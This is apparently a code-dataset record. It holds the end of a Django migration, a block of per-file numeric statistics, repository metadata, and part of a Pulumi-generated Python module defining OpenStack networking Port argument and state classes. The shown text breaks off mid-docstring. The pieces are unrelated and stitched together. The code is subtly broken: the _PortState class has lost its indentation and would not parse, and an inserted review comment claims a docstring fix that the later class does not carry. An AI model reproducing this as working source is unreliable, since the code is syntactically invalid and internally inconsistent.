            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_supplier_address', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='branding',
            name='supplier_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_supplier_contact', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='branding',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='branding', to='fleet_management.Vehicle'),
        ),
    ]
| 55.664488
| 194
| 0.66865
| 2,682
| 25,550
| 6.162192
| 0.041014
| 0.043081
| 0.074545
| 0.117142
| 0.961699
| 0.961699
| 0.929449
| 0.9165
| 0.865311
| 0.860834
| 0
| 0.002034
| 0.210881
| 25,550
| 458
| 195
| 55.786026
| 0.817677
| 0.002661
| 0
| 0.842222
| 1
| 0
| 0.163468
| 0.057381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011111
| 0
| 0.02
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
befc70c964a89a238d0a12a520e07d654b020747
| 71,097
|
py
|
Python
|
sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/networking/port.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PortArgs', 'Port']
@pulumi.input_type
class PortArgs:
    def __init__(__self__, *,
                 network_id: pulumi.Input[str],
                 admin_state_up: Optional[pulumi.Input[bool]] = None,
                 allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]] = None,
                 binding: Optional[pulumi.Input['PortBindingArgs']] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 device_id: Optional[pulumi.Input[str]] = None,
                 device_owner: Optional[pulumi.Input[str]] = None,
                 dns_name: Optional[pulumi.Input[str]] = None,
                 extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]] = None,
                 fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]] = None,
                 mac_address: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 no_fixed_ip: Optional[pulumi.Input[bool]] = None,
                 no_security_groups: Optional[pulumi.Input[bool]] = None,
                 port_security_enabled: Optional[pulumi.Input[bool]] = None,
                 qos_policy_id: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None):
        """
        The set of arguments for constructing a Port resource.
        :param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
               this creates a new port.
        :param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
               (must be `true` or `false` if provided). Changing this updates the
               `admin_state_up` of an existing port.
        :param pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]] allowed_address_pairs: An IP/MAC Address pair of additional IP
               addresses that can be active on this port. The structure is described
               below.
        :param pulumi.Input['PortBindingArgs'] binding: The port binding allows to specify binding information
               for the port. The structure is described below.
        :param pulumi.Input[str] description: Human-readable description of the port. Changing
               this updates the `description` of an existing port.
        :param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
               creates a new port.
        :param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
               a new port.
        :param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
               is enabled.
        :param pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]] extra_dhcp_options: An extra DHCP option that needs to be configured
               on the port. The structure is described below. Can be specified multiple
               times.
        :param pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]] fixed_ips: An array of desired IPs for
               this port. The structure is described below.
        :param pulumi.Input[str] mac_address: The additional MAC address.
        :param pulumi.Input[str] name: A unique name for the port. Changing this
               updates the `name` of an existing port.
        :param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
               IP address. This will also remove any fixed IPs previously set on a port. `true`
               is the only valid value for this argument.
        :param pulumi.Input[bool] no_security_groups: If set to
               `true`, then no security groups are applied to the port. If set to `false` and
               no `security_group_ids` are specified, then the port will yield to the default
               behavior of the Networking service, which is to usually apply the "default"
               security group.
        :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
               port security on the port. Port Security is usually enabled by default, so
               omitting argument will usually result in a value of `true`. Setting this
               explicitly to `false` will disable port security. In order to disable port
               security, the port must not have any security groups. Valid values are `true`
               and `false`.
        :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
        :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
               A Networking client is needed to create a port. If omitted, the
               `region` argument of the provider is used. Changing this creates a new
               port.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
               of security group IDs to apply to the port. The security groups must be
               specified by ID and not name (as opposed to how they are configured with
               the Compute Instance).
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
        :param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
               to create a port for another tenant. Changing this creates a new port.
        :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
        """
        pulumi.set(__self__, "network_id", network_id)
        if admin_state_up is not None:
            pulumi.set(__self__, "admin_state_up", admin_state_up)
        if allowed_address_pairs is not None:
            pulumi.set(__self__, "allowed_address_pairs", allowed_address_pairs)
        if binding is not None:
            pulumi.set(__self__, "binding", binding)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if device_id is not None:
            pulumi.set(__self__, "device_id", device_id)
        if device_owner is not None:
            pulumi.set(__self__, "device_owner", device_owner)
        if dns_name is not None:
            pulumi.set(__self__, "dns_name", dns_name)
        if extra_dhcp_options is not None:
            pulumi.set(__self__, "extra_dhcp_options", extra_dhcp_options)
        if fixed_ips is not None:
            pulumi.set(__self__, "fixed_ips", fixed_ips)
        if mac_address is not None:
            pulumi.set(__self__, "mac_address", mac_address)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if no_fixed_ip is not None:
            pulumi.set(__self__, "no_fixed_ip", no_fixed_ip)
        if no_security_groups is not None:
            pulumi.set(__self__, "no_security_groups", no_security_groups)
        if port_security_enabled is not None:
            pulumi.set(__self__, "port_security_enabled", port_security_enabled)
        if qos_policy_id is not None:
            pulumi.set(__self__, "qos_policy_id", qos_policy_id)
        if region is not None:
            pulumi.set(__self__, "region", region)
        if security_group_ids is not None:
            pulumi.set(__self__, "security_group_ids", security_group_ids)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if tenant_id is not None:
            pulumi.set(__self__, "tenant_id", tenant_id)
        if value_specs is not None:
            pulumi.set(__self__, "value_specs", value_specs)

    @property
    @pulumi.getter(name="networkId")
    def network_id(self) -> pulumi.Input[str]:
        """
        The ID of the network to attach the port to. Changing
        this creates a new port.
        """
        return pulumi.get(self, "network_id")

    @network_id.setter
    def network_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "network_id", value)

    @property
    @pulumi.getter(name="adminStateUp")
    def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
        """
        Administrative up/down status for the port
        (must be `true` or `false` if provided). Changing this updates the
        `admin_state_up` of an existing port.
        """
        return pulumi.get(self, "admin_state_up")

    @admin_state_up.setter
    def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "admin_state_up", value)

    @property
    @pulumi.getter(name="allowedAddressPairs")
    def allowed_address_pairs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]:
        """
        An IP/MAC Address pair of additional IP
        addresses that can be active on this port. The structure is described
        below.
        """
        return pulumi.get(self, "allowed_address_pairs")

    @allowed_address_pairs.setter
    def allowed_address_pairs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]):
        pulumi.set(self, "allowed_address_pairs", value)

    @property
    @pulumi.getter
    def binding(self) -> Optional[pulumi.Input['PortBindingArgs']]:
        """
        The port binding allows to specify binding information
        for the port. The structure is described below.
        """
        return pulumi.get(self, "binding")

    @binding.setter
    def binding(self, value: Optional[pulumi.Input['PortBindingArgs']]):
        pulumi.set(self, "binding", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable description of the port. Changing
        this updates the `description` of an existing port.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="deviceId")
    def device_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the device attached to the port. Changing this
        creates a new port.
        """
        return pulumi.get(self, "device_id")

    @device_id.setter
    def device_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device_id", value)

    @property
    @pulumi.getter(name="deviceOwner")
    def device_owner(self) -> Optional[pulumi.Input[str]]:
        """
        The device owner of the port. Changing this creates
        a new port.
        """
        return pulumi.get(self, "device_owner")

    @device_owner.setter
    def device_owner(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "device_owner", value)

    @property
    @pulumi.getter(name="dnsName")
    def dns_name(self) -> Optional[pulumi.Input[str]]:
        """
        The port DNS name. Available, when Neutron DNS extension
        is enabled.
        """
        return pulumi.get(self, "dns_name")

    @dns_name.setter
    def dns_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "dns_name", value)

    @property
    @pulumi.getter(name="extraDhcpOptions")
    def extra_dhcp_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]:
        """
        An extra DHCP option that needs to be configured
        on the port. The structure is described below. Can be specified multiple
        times.
        """
        return pulumi.get(self, "extra_dhcp_options")

    @extra_dhcp_options.setter
    def extra_dhcp_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]):
        pulumi.set(self, "extra_dhcp_options", value)

    @property
    @pulumi.getter(name="fixedIps")
    def fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]:
        """
        An array of desired IPs for
        this port. The structure is described below.
        """
        return pulumi.get(self, "fixed_ips")

    @fixed_ips.setter
    def fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]):
        pulumi.set(self, "fixed_ips", value)

    @property
    @pulumi.getter(name="macAddress")
    def mac_address(self) -> Optional[pulumi.Input[str]]:
        """
        The additional MAC address.
        """
        return pulumi.get(self, "mac_address")

    @mac_address.setter
    def mac_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mac_address", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        A unique name for the port. Changing this
        updates the `name` of an existing port.
        """
        # NOTE(review): the generated doc previously said "Name of the DHCP
        # option." — a tfgen doc-mapping slip from the nested
        # `extra_dhcp_options.name` field; corrected to the port's own name.
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="noFixedIp")
    def no_fixed_ip(self) -> Optional[pulumi.Input[bool]]:
        """
        Create a port with no fixed
        IP address. This will also remove any fixed IPs previously set on a port. `true`
        is the only valid value for this argument.
        """
        return pulumi.get(self, "no_fixed_ip")

    @no_fixed_ip.setter
    def no_fixed_ip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "no_fixed_ip", value)

    @property
    @pulumi.getter(name="noSecurityGroups")
    def no_security_groups(self) -> Optional[pulumi.Input[bool]]:
        """
        If set to
        `true`, then no security groups are applied to the port. If set to `false` and
        no `security_group_ids` are specified, then the port will yield to the default
        behavior of the Networking service, which is to usually apply the "default"
        security group.
        """
        return pulumi.get(self, "no_security_groups")

    @no_security_groups.setter
    def no_security_groups(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "no_security_groups", value)

    @property
    @pulumi.getter(name="portSecurityEnabled")
    def port_security_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to explicitly enable or disable
        port security on the port. Port Security is usually enabled by default, so
        omitting argument will usually result in a value of `true`. Setting this
        explicitly to `false` will disable port security. In order to disable port
        security, the port must not have any security groups. Valid values are `true`
        and `false`.
        """
        return pulumi.get(self, "port_security_enabled")

    @port_security_enabled.setter
    def port_security_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "port_security_enabled", value)

    @property
    @pulumi.getter(name="qosPolicyId")
    def qos_policy_id(self) -> Optional[pulumi.Input[str]]:
        """
        Reference to the associated QoS policy.
        """
        return pulumi.get(self, "qos_policy_id")

    @qos_policy_id.setter
    def qos_policy_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "qos_policy_id", value)

    @property
    @pulumi.getter
    def region(self) -> Optional[pulumi.Input[str]]:
        """
        The region in which to obtain the V2 Networking client.
        A Networking client is needed to create a port. If omitted, the
        `region` argument of the provider is used. Changing this creates a new
        port.
        """
        return pulumi.get(self, "region")

    @region.setter
    def region(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "region", value)

    @property
    @pulumi.getter(name="securityGroupIds")
    def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list
        of security group IDs to apply to the port. The security groups must be
        specified by ID and not name (as opposed to how they are configured with
        the Compute Instance).
        """
        return pulumi.get(self, "security_group_ids")

    @security_group_ids.setter
    def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "security_group_ids", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A set of string tags for the port.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """
        The owner of the port. Required if admin wants
        to create a port for another tenant. Changing this creates a new port.
        """
        return pulumi.get(self, "tenant_id")

    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)

    @property
    @pulumi.getter(name="valueSpecs")
    def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        Map of additional options.
        """
        return pulumi.get(self, "value_specs")

    @value_specs.setter
    def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "value_specs", value)
@pulumi.input_type
class _PortState:
def __init__(__self__, *,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allowed_address_pairs: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]] = None,
binding: Optional[pulumi.Input['PortBindingArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
device_id: Optional[pulumi.Input[str]] = None,
device_owner: Optional[pulumi.Input[str]] = None,
dns_assignments: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
extra_dhcp_options: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]] = None,
fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_fixed_ip: Optional[pulumi.Input[bool]] = None,
no_security_groups: Optional[pulumi.Input[bool]] = None,
port_security_enabled: Optional[pulumi.Input[bool]] = None,
qos_policy_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Input properties used for looking up and filtering Port resources.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_fixed_ips: The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_security_group_ids: The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the port, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]] allowed_address_pairs: An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
:param pulumi.Input['PortBindingArgs'] binding: The port binding allows to specify binding information
for the port. The structure is described below.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing port.
:param pulumi.Input[str] device_id: The ID of the device attached to the port. Changing this
creates a new port.
:param pulumi.Input[str] device_owner: The device owner of the port. Changing this creates
a new port.
:param pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]] dns_assignments: The list of maps representing port DNS assignments.
:param pulumi.Input[str] dns_name: The port DNS name. Available, when Neutron DNS extension
is enabled.
:param pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]] extra_dhcp_options: An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
:param pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]] fixed_ips: An array of desired IPs for
this port. The structure is described below.
:param pulumi.Input[str] mac_address: The additional MAC address.
:param pulumi.Input[str] name: Name of the DHCP option.
:param pulumi.Input[str] network_id: The ID of the network to attach the port to. Changing
this creates a new port.
:param pulumi.Input[bool] no_fixed_ip: Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
:param pulumi.Input[bool] no_security_groups: If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
:param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
:param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
:param pulumi.Input[str] region: The region in which to obtain the V2 Networking client.
A Networking client is needed to create a port. If omitted, the
`region` argument of the provider is used. Changing this creates a new
port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list
of security group IDs to apply to the port. The security groups must be
specified by ID and not name (as opposed to how they are configured with
the Compute Instance).
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the port.
:param pulumi.Input[str] tenant_id: The owner of the port. Required if admin wants
to create a port for another tenant. Changing this creates a new port.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
"""
if admin_state_up is not None:
pulumi.set(__self__, "admin_state_up", admin_state_up)
if all_fixed_ips is not None:
pulumi.set(__self__, "all_fixed_ips", all_fixed_ips)
if all_security_group_ids is not None:
pulumi.set(__self__, "all_security_group_ids", all_security_group_ids)
if all_tags is not None:
pulumi.set(__self__, "all_tags", all_tags)
if allowed_address_pairs is not None:
pulumi.set(__self__, "allowed_address_pairs", allowed_address_pairs)
if binding is not None:
pulumi.set(__self__, "binding", binding)
if description is not None:
pulumi.set(__self__, "description", description)
if device_id is not None:
pulumi.set(__self__, "device_id", device_id)
if device_owner is not None:
pulumi.set(__self__, "device_owner", device_owner)
if dns_assignments is not None:
pulumi.set(__self__, "dns_assignments", dns_assignments)
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if extra_dhcp_options is not None:
pulumi.set(__self__, "extra_dhcp_options", extra_dhcp_options)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if name is not None:
pulumi.set(__self__, "name", name)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if no_fixed_ip is not None:
pulumi.set(__self__, "no_fixed_ip", no_fixed_ip)
if no_security_groups is not None:
pulumi.set(__self__, "no_security_groups", no_security_groups)
if port_security_enabled is not None:
pulumi.set(__self__, "port_security_enabled", port_security_enabled)
if qos_policy_id is not None:
pulumi.set(__self__, "qos_policy_id", qos_policy_id)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if value_specs is not None:
pulumi.set(__self__, "value_specs", value_specs)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> Optional[pulumi.Input[bool]]:
"""
Administrative up/down status for the port
(must be `true` or `false` if provided). Changing this updates the
`admin_state_up` of an existing port.
"""
return pulumi.get(self, "admin_state_up")
@admin_state_up.setter
def admin_state_up(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "admin_state_up", value)
@property
@pulumi.getter(name="allFixedIps")
def all_fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of Fixed IP addresses on the port in the
order returned by the Network v2 API.
"""
return pulumi.get(self, "all_fixed_ips")
@all_fixed_ips.setter
def all_fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_fixed_ips", value)
@property
@pulumi.getter(name="allSecurityGroupIds")
def all_security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of Security Group IDs on the port
which have been explicitly and implicitly added.
"""
return pulumi.get(self, "all_security_group_ids")
@all_security_group_ids.setter
def all_security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_security_group_ids", value)
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The collection of tags assigned on the port, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@all_tags.setter
def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "all_tags", value)
@property
@pulumi.getter(name="allowedAddressPairs")
def allowed_address_pairs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]:
"""
An IP/MAC Address pair of additional IP
addresses that can be active on this port. The structure is described
below.
"""
return pulumi.get(self, "allowed_address_pairs")
@allowed_address_pairs.setter
def allowed_address_pairs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortAllowedAddressPairArgs']]]]):
pulumi.set(self, "allowed_address_pairs", value)
@property
@pulumi.getter
def binding(self) -> Optional[pulumi.Input['PortBindingArgs']]:
"""
The port binding allows to specify binding information
for the port. The structure is described below.
"""
return pulumi.get(self, "binding")
@binding.setter
def binding(self, value: Optional[pulumi.Input['PortBindingArgs']]):
pulumi.set(self, "binding", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing port.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="deviceId")
def device_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the device attached to the port. Changing this
creates a new port.
"""
return pulumi.get(self, "device_id")
@device_id.setter
def device_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_id", value)
@property
@pulumi.getter(name="deviceOwner")
def device_owner(self) -> Optional[pulumi.Input[str]]:
"""
The device owner of the port. Changing this creates
a new port.
"""
return pulumi.get(self, "device_owner")
@device_owner.setter
def device_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_owner", value)
@property
@pulumi.getter(name="dnsAssignments")
def dns_assignments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]]:
"""
The list of maps representing port DNS assignments.
"""
return pulumi.get(self, "dns_assignments")
@dns_assignments.setter
def dns_assignments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, Any]]]]]):
pulumi.set(self, "dns_assignments", value)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
The port DNS name. Available, when Neutron DNS extension
is enabled.
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="extraDhcpOptions")
def extra_dhcp_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]:
"""
An extra DHCP option that needs to be configured
on the port. The structure is described below. Can be specified multiple
times.
"""
return pulumi.get(self, "extra_dhcp_options")
@extra_dhcp_options.setter
def extra_dhcp_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortExtraDhcpOptionArgs']]]]):
pulumi.set(self, "extra_dhcp_options", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]:
"""
An array of desired IPs for
this port. The structure is described below.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PortFixedIpArgs']]]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[pulumi.Input[str]]:
"""
The additional MAC address.
"""
return pulumi.get(self, "mac_address")
@mac_address.setter
def mac_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mac_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the DHCP option.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the network to attach the port to. Changing
this creates a new port.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="noFixedIp")
def no_fixed_ip(self) -> Optional[pulumi.Input[bool]]:
"""
Create a port with no fixed
IP address. This will also remove any fixed IPs previously set on a port. `true`
is the only valid value for this argument.
"""
return pulumi.get(self, "no_fixed_ip")
@no_fixed_ip.setter
def no_fixed_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_fixed_ip", value)
@property
@pulumi.getter(name="noSecurityGroups")
def no_security_groups(self) -> Optional[pulumi.Input[bool]]:
"""
If set to
`true`, then no security groups are applied to the port. If set to `false` and
no `security_group_ids` are specified, then the port will yield to the default
behavior of the Networking service, which is to usually apply the "default"
security group.
"""
return pulumi.get(self, "no_security_groups")
@no_security_groups.setter
def no_security_groups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_security_groups", value)
@property
@pulumi.getter(name="portSecurityEnabled")
def port_security_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to explicitly enable or disable
port security on the port. Port Security is usually enabled by default, so
omitting argument will usually result in a value of `true`. Setting this
explicitly to `false` will disable port security. In order to disable port
security, the port must not have any security groups. Valid values are `true`
and `false`.
"""
return pulumi.get(self, "port_security_enabled")
@port_security_enabled.setter
def port_security_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "port_security_enabled", value)
@property
@pulumi.getter(name="qosPolicyId")
def qos_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Reference to the associated QoS policy.
"""
return pulumi.get(self, "qos_policy_id")
@qos_policy_id.setter
def qos_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "qos_policy_id", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
